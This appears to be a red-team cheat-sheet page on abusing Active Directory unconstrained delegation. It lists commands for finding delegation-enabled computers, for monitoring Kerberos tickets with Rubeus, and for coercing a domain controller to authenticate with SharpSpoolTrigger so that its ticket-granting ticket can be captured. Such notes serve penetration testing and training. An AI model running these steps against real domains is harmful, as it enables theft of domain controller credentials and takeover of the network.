Skip to content

Unconstrained Delegation

Identify

Linux - remote 

nxc ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation
Windows - local 
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

Domain Controllers are always permitted for unconstrained delegation.

Exploit

Force DC to auth to our box and steal TGT

Monitor for tickets with Rubeus 

Rubeus.exe monitor /interval:10 /nowrap

see: Authentication Coercion

OR: Run https://github.com/cube0x0/SharpSystemTriggers to coerce authentication 

SharpSpoolTrigger.exe dc01.lab.local web.dev.lav.local
Where: - DC01 is the "target". - WEB is the "listener".

Rebeus should capture a ticket